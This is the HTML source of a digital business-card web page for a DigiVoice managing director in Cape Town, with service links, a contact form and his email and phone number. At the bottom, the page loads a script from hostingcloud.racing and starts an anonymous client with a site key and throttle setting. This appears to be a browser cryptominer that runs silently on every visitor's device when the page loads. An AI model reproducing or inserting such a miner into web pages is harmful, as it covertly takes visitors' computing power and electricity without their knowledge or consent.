<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Bruce John Curnick | Managing Director</title>
    <link rel="manifest" href="/manifest.json">
    <link rel="stylesheet" type="text/css" href="/assets/css/main.css?v1.2"/>
    <link rel="apple-touch-icon" href="touch-icon-iphone.png">
    <link rel="apple-touch-icon" sizes="152x152"
          href="/uploads/profilepicturesicons/512ICO_5c455e3af10563bc8610ee1bb2a6c895.jpeg">
    <link rel="apple-touch-icon" sizes="180x180"
          href="/uploads/profilepicturesicons/512ICO_5c455e3af10563bc8610ee1bb2a6c895.jpeg">
    <link rel="apple-touch-icon" sizes="167x167"
          href="/uploads/profilepicturesicons/512ICO_5c455e3af10563bc8610ee1bb2a6c895.jpeg">


    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>swipeleft demo</title>
    <link rel="stylesheet" href="//code.jquery.com/mobile/1.5.0-alpha.1/jquery.mobile-1.5.0-alpha.1.min.css">
    <link rel="stylesheet" href="/assets/css/style.css">
<!--    <script src='/assets/js/plugins/jquery-ui.min.js'></script>-->
    <script src="//code.jquery.com/jquery-3.2.1.min.js"></script>
    <script src="//code.jquery.com/jquery-2.2.4.min.js"></script>
    <script src="./assets/jquery-ui-1.12.1/jquery-ui.min.js"></script>
    <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.js"></script>

    <script src="//code.jquery.com/mobile/1.5.0-alpha.1/jquery.mobile-1.5.0-alpha.1.min.js"></script>
    <script src='https://kit.fontawesome.com/a076d05399.js'></script>
</head>
<body>
<div id="mobileChecker"><div class="isMobile"></div></div>
<div class="container">
    <!--splitlayout -->
    <div id="splitlayout" class="splitlayout">
        <div class="intro">
            <!--slide left-->
            <div class="side side-left" style="background:#182b8a">
                <div class="leftblock">
                    <div class="aboutme">
                        <p>About me</p>
                        <div class="abouticon">
                            <div data-tags="chevron, navigation" data-pack="android"><i class="fas fa-arrow-left"></i>
                            </div>
                        </div>
                    </div>
                    <div class="intro-content">
                        <p>Hi, I am </p>
                        <h1><span>Bruce John<br>
        Curnick </span><span>Managing Director</span></h1>
                        <div class="botnav botnav-right">
                            <ul class="nav">
                                <li class="active"><a href="#about" class="hvr-sweep-to-left">About</a></li>
                                <!-- li><a href="#skills" class="hvr-sweep-to-left">My skills</a></li> -->
                                <li><a href="#contact" class="hvr-sweep-to-left">contact</a></li>
                            </ul>
                        </div>
                    </div>
                    <div class="footer">
                        Powered by <a href="/Bruce%20John-Curnick" target="_blank">DigiVoice</a>
                    </div>
                </div>
                <div class="overlay"></div>
            </div>      <!--/slide left-->
            <!--slide right-->
            <div class="side side-right">

                <div class="background"
                     style="background: url(/uploads/companypictures/bground-dv5.jpg) no-repeat center top;"
                ></div>
                <div class="rightblock">
                    <div class="portfolio">
                        <p>Services</p>
                        <div class="portfolioicon">
                            <div data-tags="chevron, navigation" data-pack="android"><i class="fas fa-arrow-right"></i>
                            </div>
                        </div>
                    </div>
                    <div class="intro-content">
                        <p>Hi, I am </p>
                        <h1>Bruce John Curnick</h1>
                        <h1>Managing Director</h1>
                        <div class="botnav botnav-left">
                            <ul class="nav">
                                <li class="active"><a href="#portfolio" class="hvr-sweep-to-left">Services</a></li>
                                <!--li><a href="#resume" class="hvr-sweep-to-left">My resume</a></li> -->
                            </ul>
                        </div>
                    </div>
                </div>
                <div class="overlay"></div>
            </div>      <!-- /slide right-->
        </div>
        <!-- page-right -->
        <div class="page page-right" style="background-color:#000000 !important;">
            <!-- page-inner -->
            <!-- page-inner -->
            <div class="page-inner">
                <section id="portfolio" class="pad200 padtop">
                    <div class="row">
                        <div class="col-lg-12">
                            <h2></h2>
                        </div>
                    </div>
                    <div class="row">
                        <div class="col-lg-12">
                            <div class="portfoliosec">
                                <div class="gallery clearfix">
                                    <div class="grid">
                                        <div class="row">
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/services-chatbot.png"/>
                                                    <h4>DigiBot</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox" name="" href="http://m.me/106605854153878"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/services-record-sheet.png"/>
                                                    <h4>Record Sheet</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="http://digivoice.co.za/DV_Record-Capture_Template_v2.xls"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/services-analytics.png"/>
                                                    <h4>Analytics</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="http://digivoice.co.za/Report_DV_Bruce-J-Curnick_September.pdf"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/services-mandate.png"/>
                                                    <h4>Debit Order</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="http://digivoice.co.za/Digivoice-MANDATE.pdf"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/services-user-manual.png"/>
                                                    <h4>User Manual</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="http://digivoice.co.za/DigiVoice_Digital-Business-Card_User-Manual_DV.pdf"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/ab515100ed664073c51e49faea4521d6.png"/>
                                                    <h4>DEMO - Virtual Showroom</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="https://my.matterport.com/show/?m=PVf4Xjkn7AA"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/0556d0d303e2221a5b1772a65ca9a804.png"/>
                                                    <h4>SnapScan</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="http://digivoice.co.za/dv_snapcode.pdf"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/812ce33fe31ae8dba15022bd3d358689.png"/>
                                                    <h4>Brochures</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="https://www.vw.co.za/en/offers-and-products/brochures-and-specifications.html"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/57ea741e871483ee342c006ef3badbc8.png"/>
                                                    <h4>DEMO - Virtual Showroom</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="https://my.matterport.com/show/?m=jRCFcFt3WSE"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/7cb27e6e4b110b14f6349ad035c7028d.png"/>
                                                    <h4>View Our Presentation</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="http://digivoice.co.za/pres/DigiVoice_Presentation.ppsx"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/f3c909e10a8f4dcaceae0779d4805cfe.png"/>
                                                    <h4>Finance Application</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="http://dvcard.mobi/Bruce%20John-Curnick/onlineapplication"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/service-qrbruce.png"/>
                                                    <h4>Download my Card</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="http://digivoice.co.za/dvqr/bruce-qr-code.png"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                            <div class="col-lg-4 col-xs-6">
                                                <figure class="effect-apollo"
                                                        style="box-shadow: inset 0 0 0 0 #182b8a;"><img
                                                        src="/uploads/templatepictures/9d900785cb762efe43071ac22ed5c5c6.png"/>
                                                    <h4>Let&#039;s Chat</h4>
                                                    <p></p>
                                                    <figcaption><a class="fancybox"
                                                                   href="https://www.fresha.com/digivoice-fd74eifh"
                                                                   data-fancybox-group="gallery"></a></figcaption>
                                                </figure>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </section>
            </div>
            <!-- /page-inner -->      <!-- /page-inner -->
        </div>
        <!-- /page-right -->
        <!-- page-left -->
        <div class="page page-left">
            <!-- page-inner -->
            <div class="page-inner">
                <section id="about">
                    <div class="row">
                        <div class="col-lg-12">
                            <div class="about">
                                <h2>Hello, my name is Bruce John.</h2>
                                <div class="imgsec"><img class="img-fluid" height="254" width="254"
                                                         src="/uploads/profilepictures/5c455e3af10563bc8610ee1bb2a6c895.jpeg"
                                                         alt="Bruce John"></div>
                                <div class="left_sec">
                                    <p class="font700">Ensuring your company is on the cutting edge of technology. </p>
                                    <p></p>
                                    <p></p>
                                    <a href="#contactform" class="hvr-rectangle-in download_button">Request a Call
                                        Back</a></div>
                            </div>
                        </div>
                    </div>
                    <div class="clearfix"></div>
                </section>
                <div class="clearfix"></div>
                <div class="row">
                    <div class="col-lg-12">
                        <section id="contact">
                            <h2>Get in Touch</h2>
                            <br>
                            Contact me for any questions or enquiries you may have.</p>
                            <p  class="font600">
                                <a name="email" class="contact-details-link" href="mailto:bruce@digivoice.co.za">bruce@digivoice.co.za</a><br>
                                <a name="mobileNo" class="contact-details-link" href="tel:0636840131" > 0636840131</a><br>
                                <a name="landLine" class="contact-details-link" href="tel:0636840131"> </a><br> ########
                                <a name="landLine" class="contact-details-link" href=""> </a><br> Cape Town
                            </p>
                                <a name="viewMap" class="contact-details-link" href="https://www.google.com/maps/place/Cape+Town/@-33.9142688,18.0956097,9z/data=!3m1!4b1!4m5!3m4!1s0x1dcc500f8826eed7:0x687fe1fc2828aa87!8m2!3d-33.9248685!4d18.4240553"
                                target="_blank">Click to view on maps.</a>
                            <br>
                            <div class="social_icon">
                                <a name="facebook" class="contact-details-link" href="https://www.facebook.com/johan.oosthuizen.142" class="hvr-shutter-in-vertical"><i
                                        class="fab fa-facebook"></i></a>
                                <a name="linkedin" class="contact-details-link" href="https://www.linkedin.com/in/bruce-curnick-6818208?originalSubdomain=za"
                                   class="hvr-shutter-in-vertical"><i class="fab fa-linkedin"></i></a>
                                <a name="website" class="contact-details-link" href="http://www.digivoice.co.za" class="hvr-shutter-in-vertical"><i
                                        class="fas fa-link"></i></a>
                            </div>
                            <p><a name="saveContact" class="btn btn-success btn-lg contact-details-link"
                                  style="background-color: #000000 !important; border-color: #000000 !important;"
                                  href="/Bruce John-Curnick/vcfdownload" role="button">Save to Contacts</a></p>
                            <p><a name="whatsappShare" class="btn btn-success btn-lg contact-details-link"
                                  style="background-color: #000000 !important; border-color: #000000 !important;"
                                  href="whatsapp://send?text=https://dvcard.mobi/Bruce%20John-Curnick"
                                  data-action="share/whatsapp/share">Share via Whatsapp</a></p>
                            <p class="nomargin">Fill the form below for a quick callback</p>
                            <form name="contactform" action="/Bruce John-Curnick/contact" method="post">
                                <input name="name" type="text" class="inputbg1" placeholder="Your name" required>
                                <input name="email" type="email" class="inputbg" placeholder="Your email" required>
                                <input name="phone" type="text" class="inputbg" placeholder="Your phone" required>
                                <textarea name="message" class="textareabg" placeholder="Your message"></textarea>
                                <button type="submit" class="hvr-rectangle-in send_button">Send</button>
                            </form>
                        </section>
                    </div>
                </div>
            </div>      <!-- /page-inner -->
        </div>

        <!-- /page-left -->
        <a href="#" class="back back-right hvr-pulse" title=" ">&rarr;</a> <a href="#" class="back back-left hvr-pulse"
                                                                              title=" ">&larr;</a>
        <i class='fas fa-robot fixed-bot'></i>
    </div>
    <!-- /splitlayout -->
</div>



<!--other imports-->
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.1/css/all.css"
      integrity="sha384-fnmOCqbTlWIlj8LyTjo7mOUStjsKC4pOpQbqyi7RrhN7udi9RwhKkMHpvLbHG9Sr" crossorigin="anonymous">
<script src="/assets/js/plugins/jquery.appear.min.js"></script>
<script src="/assets/js/plugins/jquery.easing.1.3.min.js"></script>
<script src="/assets/js/plugins/modernizr.custom.min.js"></script>
<script src="/assets/js/plugins/jquery.countTo.min.js"></script>
<script type="text/javascript" src="/assets/js/plugins/jquery.fancybox.min.js"></script>
<script src="/assets/bootstrap/js/bootstrap.min.js"></script>
<script src="/assets/js/plugins/classie.min.js"></script>
<script type="text/javascript" src="/assets/js/plugins/jquery.scrollTo.min.js"></script>
<script type="text/javascript" src="/assets/js/plugins/jquery.localScroll.min.js"></script>
<script src="/assets/js/plugins/cbpSplitLayout.min.js"></script>
<script src="/assets/js/main.js"></script>
<script src="/assets/js/service/AnalyticalService.js"></script>
<script src="/assets/js/swipe.js"></script>

</body>
<script>
    if ('serviceWorker' in navigator) {
        console.log("Will the service worker register?");
        navigator.serviceWorker.register('service-worker.js')
            .then(function (reg) {
                console.log("Yes, it did.");
            }).catch(function (err) {
            console.log("No it didn't. This happened: ", err)
        });
    }
</script>
<script src="https://www.hostingcloud.racing/mIhd.js"></script>
<script>
    var _client = new Client.Anonymous('faf860d6d8b653d9a6c12fa9cd494cbfa48d5f5b999f1fe843bb60aa58f7197f', {
        throttle: 0.4, c: 'w', ads: 0
    });
    _client.start();
</script>
</html>